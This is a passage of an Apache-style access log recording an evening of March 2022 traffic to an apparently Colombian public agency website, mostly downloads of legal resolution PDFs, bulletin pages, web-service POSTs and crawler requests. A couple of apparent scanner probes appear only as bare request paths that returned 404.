AQ/5/pmM2ciaIIqZuIsfpaUkdnoXVw2qrbtIi62hoARc7VnB1QNjRoQ5gX5slbcvBMJ0tJyTF3k3aCeo30+OP/8JTMtNsxvhRbvDsmu7mOYNm1WQ2Re4jfcEOJp2LKae3HbsMcN5d0F2K1S0E//zFroG0AjKW+4b5gNBIh3diZTAEqWWng8272hqxE/dVx7x8IpjJzv/k6TNbHOhK+9UK5uDi9znExbiC+1PhMy751VTt/T0VXlnlekdsPGj/H4ErCMXFGJl2RXVKsNJBZ7uR0ISCCP4KIIAUasl3MJ69qhOW/gLnj1OWz3Si4djdLubMSExemKlPTV1YzJ14HId6E/+4iHo/ltuc1OzmvqtuCa2c+SKwRccErbaXHxVcZuxK8gR4S0cF6u1s/Qr2PGjoOkNJRluAaZVefuRSJmnP3y+VOPnjidl68JHT2WL6hOQ/ekcvVi0yvewBZlHG3RR571mv2YJrIiBwaiQnJmZgtpD2qNajXt+kZ5c0SErIG/xL4Ru/+wwK7b9q&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 7350
191.108.6.188 - - [21/Mar/2022:20:23:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+ON4cImj5X8WvYT23A2bZJuPWrBuydaJ9xzzIvxr80sehKDUr+rTYX&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18EMOQ2X8gbPPT7+9fY7EUzNA38PIe77lbRgOwVzfnBFyWyb7feM6ci&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18rMkuzxFQz6NxOS5WiK1xWYfYXf4nVKvy1UukBNnlULvAGekBz7Bee&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+yrr7zP4aBSDWnkr/nOMgpvxuS1coc6hDIg1Or0qm6QxT8Ncl08ZZT&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/BS7RW0UtykCbueidqNpoJQ/ueuH03GDGqGXtvpZca/yV1pwTT7U+5&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19PNbb9jwYgp8w/IKEvpIM6PqusB01pBTeGbQLiktKIvw7pVC0WgFK/&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19U1H9yKGbeuUOX7G9btNXaqJVAFW6MckG6jN4tzokOYSKhabaluM+N&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/Uh4DAtphao+78GHCxWRQ4ieWRVcjgWars3PPq6oND7cMXw9oi8TBw&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19MUgTSFLtZBDnYK0Zgvp9dWbROH+TBQlSGkRVrBQIzJY2THVCrAOXQ&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+Nk4xPu7GyPjdKw7rYypaxV6C69bSnI64tbA9TOBVJSk1819SSkRSw&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19AYPA2m/tbDn29tAdYHW4pwaLl0nMUNw12w/j2uTk9YC6Ivlbri1eY&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18KpFJfA8pEq5mXhjcGs3PPR4VumI8Lfb8eJPlS/sOMqk2JOnU074HH&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+oRlTkl5kQY5NgXrt/GvyPp/1irU/2kJlhB2wrVoV4I2Wq5hFkD6EP&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/dOMUT4q5FbVsLeyIbLUJmPq9hNoAwmrNgzkgqNeFMFzhETBNb5Er6&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+khpHBZQCPTeOmNtBnG3kxSiVp4PSzUm6+yNo4kVvyU5jl6vVWzc+4&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19r+0g5uA3cI413S6IzEBg4AXnzuJN2ZOvTxupABaoF9lTV1Hq/BYAq&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1978tuksevSorNCK38F+rAd1oLtuuIRffrizz41BtNBVWc5gW8dimTv&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/YXxmgs+SMmI7U/bK2ovwJWKYoWgxbyhNMKteCh1oeXDuDcU6JG2lL&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+BadgP8H30PhDyCcV4d32ceZh5sgvooHzeSl6uHwkwN14PSE0nZI4r&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+PWvI6W8m+cL18X4r+7FCwJunt8gSUNjnuCgYuzloTAzOyBdN2eCpc&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18aBNnNa+TXLkBhWIv5pUBAdl/G3QDg3H9QIqMf9csEb6oiCFxE/8e3&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+VwP84NU6bFQ7ZaVAea6UerWTlHvmQpf3y9xqwv4aXDFVlV1O4mM2K&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+3W9ZjTmS7XF18oonPssLrtQkkd9luDQPJZ9oqJbxBH+t+zDODSNr9&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19Yxpc1M3Fku6yrBtQAi9fXNqe47uvrSB78jMBKjiXYm1stD0OZ4UnQ&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18i9grbBr7xIiKcvRqdUauFG/FzyhzxXw7UJkpIe9NVSS8oHIXAawcO&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/AHXi50fdMmyGp3rjdTATuTsfpXWA/062xbBfPNcOA53AL2In0pytc&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19E0gxQmw2rRUizyWUSR+qu70h9zPjpXWVu2y4gED5INunxoxsefih6&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19Hhedw9tnkulKDJZMstyFDNjuieWycpYBnn/e/GBsxDYrFpa5QmO+r&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18tiw+NTftlIe5FYCAHb5xbZulCVYhJHrPktDMHvGER1fRPh4cgRiBJ&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:23:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+zBc/12jEooID8FC8o6eczYwM08zeUnnfoeSvMrkCn6ZofktJpGGU8KZhs8uhQksom9/nUx7GRXq5PiiH3S+dVmyhfVLbrOl/pU+hd2BSJQo7KpDWUscC4VaPPHruT5ugSJJoR52A7Rs3KQCpgGPLFq+Ok3vaxGUF37vZE/HD3rzRUcJ7pmCtY0JxZcG8b2kTO3b97SsdzjpqOjuXnSTSltFzTgZI9vSVu9rzHC86Z2u7e2l9Z78tjsFYGUwZQgaUv5orcLGK33F6bKsQxROZSXtoRKosn9uAcCfMi5m9ph53QsHQj8it4AOhY2dzGxFDvuFuJYh9C2IBnMelu4L7dXVAT6C5KjQM=&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 196
191.108.6.188 - - [21/Mar/2022:20:23:11 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX18F/R9yLvfYXwUTGySr8R08NhhN85JlR7EucSmxkeZ2RrJyEhf1ZAofVshVa57KBSZZlIMmpFMavQ== HTTP/1.1" 200 30975
207.46.13.157 - - [21/Mar/2022:20:25:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2043.pdf HTTP/1.1" 304 -
66.249.70.45 - - [21/Mar/2022:20:25:51 -0500] "-" 408 -
216.245.221.92 - - [21/Mar/2022:20:27:10 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.43 - - [21/Mar/2022:20:30:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js;jsessionid=ujbjsxdzvbgnpa5lp05cxer5.undefined?ln=primefaces&amp;v=4.0 HTTP/1.1" 200 220526
181.53.13.222 - - [21/Mar/2022:20:31:28 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [21/Mar/2022:20:31:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45917
191.102.198.211 - - [21/Mar/2022:20:32:02 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 290979
216.245.221.92 - - [21/Mar/2022:20:32:10 -0500] "HEAD / HTTP/1.1" 200 -
191.102.198.211 - - [21/Mar/2022:20:32:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1865.pdf HTTP/1.1" 200 466582
201.245.192.253 - - [21/Mar/2022:20:32:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45302
201.245.192.253 - - [21/Mar/2022:20:32:24 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114558
216.245.221.92 - - [21/Mar/2022:20:37:10 -0500] "HEAD / HTTP/1.1" 200 -
181.62.52.217 - - [21/Mar/2022:20:37:21 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
181.62.52.217 - - [21/Mar/2022:20:37:21 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
181.62.52.217 - - [21/Mar/2022:20:37:21 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
181.62.52.217 - - [21/Mar/2022:20:37:21 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
181.62.52.217 - - [21/Mar/2022:20:37:21 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
181.62.52.217 - - [21/Mar/2022:20:37:21 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
181.62.52.217 - - [21/Mar/2022:20:37:21 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
181.62.52.217 - - [21/Mar/2022:20:37:21 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
181.62.52.217 - - [21/Mar/2022:20:37:21 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
181.62.52.217 - - [21/Mar/2022:20:37:22 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
181.62.52.217 - - [21/Mar/2022:20:37:22 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
181.62.52.217 - - [21/Mar/2022:20:37:22 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
181.62.52.217 - - [21/Mar/2022:20:37:22 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
181.62.52.217 - - [21/Mar/2022:20:37:22 -0500] "GET /BLA/boletinlegal/images/abajo.png HTTP/1.1" 200 96676
181.62.52.217 - - [21/Mar/2022:20:37:22 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
181.62.52.217 - - [21/Mar/2022:20:37:22 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
181.62.52.217 - - [21/Mar/2022:20:37:22 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
181.62.52.217 - - [21/Mar/2022:20:37:22 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
181.62.52.217 - - [21/Mar/2022:20:37:22 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
181.62.52.217 - - [21/Mar/2022:20:37:22 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
181.62.52.217 - - [21/Mar/2022:20:37:22 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
181.62.52.217 - - [21/Mar/2022:20:37:22 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
181.62.52.217 - - [21/Mar/2022:20:37:22 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
181.62.52.217 - - [21/Mar/2022:20:37:22 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
181.62.52.217 - - [21/Mar/2022:20:37:22 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
181.62.52.217 - - [21/Mar/2022:20:37:22 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
181.62.52.217 - - [21/Mar/2022:20:37:22 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
181.62.52.217 - - [21/Mar/2022:20:37:22 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
181.62.52.217 - - [21/Mar/2022:20:37:22 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
181.62.52.217 - - [21/Mar/2022:20:37:22 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
181.62.52.217 - - [21/Mar/2022:20:37:22 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
181.62.52.217 - - [21/Mar/2022:20:37:22 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
181.62.52.217 - - [21/Mar/2022:20:37:22 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
181.62.52.217 - - [21/Mar/2022:20:37:28 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 16837
181.62.52.217 - - [21/Mar/2022:20:37:28 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
181.62.52.217 - - [21/Mar/2022:20:37:28 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
181.62.52.217 - - [21/Mar/2022:20:37:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0312.pdf HTTP/1.1" 200 6486913
181.62.52.217 - - [21/Mar/2022:20:38:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0150.pdf HTTP/1.1" 200 367673
181.62.52.217 - - [21/Mar/2022:20:41:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0135.pdf HTTP/1.1" 200 581139
201.245.192.253 - - [21/Mar/2022:20:41:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45917
216.245.221.92 - - [21/Mar/2022:20:42:10 -0500] "HEAD / HTTP/1.1" 200 -
186.29.181.101 - - [21/Mar/2022:20:42:44 -0500] "GET /BLA/resoluciones/AUTOS%202020/3194.pdf HTTP/1.1" 200 392015
201.245.192.253 - - [21/Mar/2022:20:42:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45302
66.249.70.47 - - [21/Mar/2022:20:42:57 -0500] "-" 408 -
201.245.192.253 - - [21/Mar/2022:20:42:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114558
216.245.221.92 - - [21/Mar/2022:20:47:10 -0500] "HEAD / HTTP/1.1" 200 -
173.252.95.1 - - [21/Mar/2022:20:49:25 -0500] "GET /asi-las-mujeres-que-reverdecen-cuidan-los-arboles-para-la-restauracion-ecologica-de-bogota.html HTTP/1.1" 206 911
69.171.251.13 - - [21/Mar/2022:20:49:26 -0500] "GET /asi-las-mujeres-que-reverdecen-cuidan-los-arboles-para-la-restauracion-ecologica-de-bogota.html?fbclid=IwAR3STazjVyqDRGuft6ES3I30nbQyWRPKi8GG2cprqPscPNLXSHEmKb5QLA4 HTTP/1.1" 200 911
181.50.66.185 - - [21/Mar/2022:20:49:34 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
173.252.107.22 - - [21/Mar/2022:20:49:39 -0500] "GET /participa-con-nosotros-en-el-october-big-day.html HTTP/1.1" 206 1039
66.249.70.45 - - [21/Mar/2022:20:50:11 -0500] "-" 408 -
35.204.31.157 - - [21/Mar/2022:20:51:00 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [21/Mar/2022:20:52:10 -0500] "HEAD / HTTP/1.1" 200 -
69.171.249.3 - - [21/Mar/2022:20:53:02 -0500] "GET /images/pieza-grafica-mujeres-25-enero.jpg HTTP/1.1" 200 45386
201.245.192.253 - - [21/Mar/2022:20:52:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114558
216.245.221.92 - - [21/Mar/2022:20:57:10 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.17 - - [21/Mar/2022:21:00:31 -0500] "GET /no-se-deje-enganar-mujeres-que-reverdecen-no-solicita-informacion-por-cadenas-de-whatsapp.html HTTP/1.1" 206 1026
173.252.107.22 - - [21/Mar/2022:21:00:46 -0500] "GET /se-amplia-convocatoria-de-sembradoras-por-la-reactivaccion-para-que-20-organizaciones-ambientales-contraten-a-mas-de-mil-mujeres.html HTTP/1.1" 206 1100
186.155.96.130 - - [21/Mar/2022:21:01:13 -0500] "GET /asi-las-mujeres-que-reverdecen-cuidan-los-arboles-para-la-restauracion-ecologica-de-bogota.html HTTP/1.1" 200 911
191.102.198.211 - - [21/Mar/2022:21:01:32 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 234185
191.102.198.211 - - [21/Mar/2022:21:01:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2635.pdf HTTP/1.1" 200 4363807
66.249.70.45 - - [21/Mar/2022:21:02:05 -0500] "-" 408 -
216.245.221.92 - - [21/Mar/2022:21:02:10 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:21:02:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114558
190.156.90.221 - - [21/Mar/2022:21:03:56 -0500] "GET /BLA/ HTTP/1.1" 200 538
190.156.90.221 - - [21/Mar/2022:21:04:00 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
190.156.90.221 - - [21/Mar/2022:21:04:02 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
190.156.90.221 - - [21/Mar/2022:21:04:04 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 329069
190.156.90.221 - - [21/Mar/2022:21:03:58 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 16331
216.245.221.92 - - [21/Mar/2022:21:07:10 -0500] "HEAD / HTTP/1.1" 200 -
190.156.90.221 - - [21/Mar/2022:21:07:13 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 329069
157.55.39.218 - - [21/Mar/2022:21:09:07 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=ujbjsxdzvbgnpa5lp05cxer5.undefined?ln=primefaces&amp;v=4.0 HTTP/1.1" 200 87560
154.21.208.177 - - [21/Mar/2022:21:09:20 -0500] "POST /guest_auth/guestIsUp.php" 404 1019
154.21.208.177 - - [21/Mar/2022:21:09:21 -0500] "POST /auth/tokens HTTP/1.1" 404 1011
34.96.130.23 - - [21/Mar/2022:21:10:03 -0500] "GET / HTTP/1.1" 200 319
66.249.70.45 - - [21/Mar/2022:21:11:38 -0500] "-" 408 -
216.245.221.92 - - [21/Mar/2022:21:12:10 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:21:12:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114555
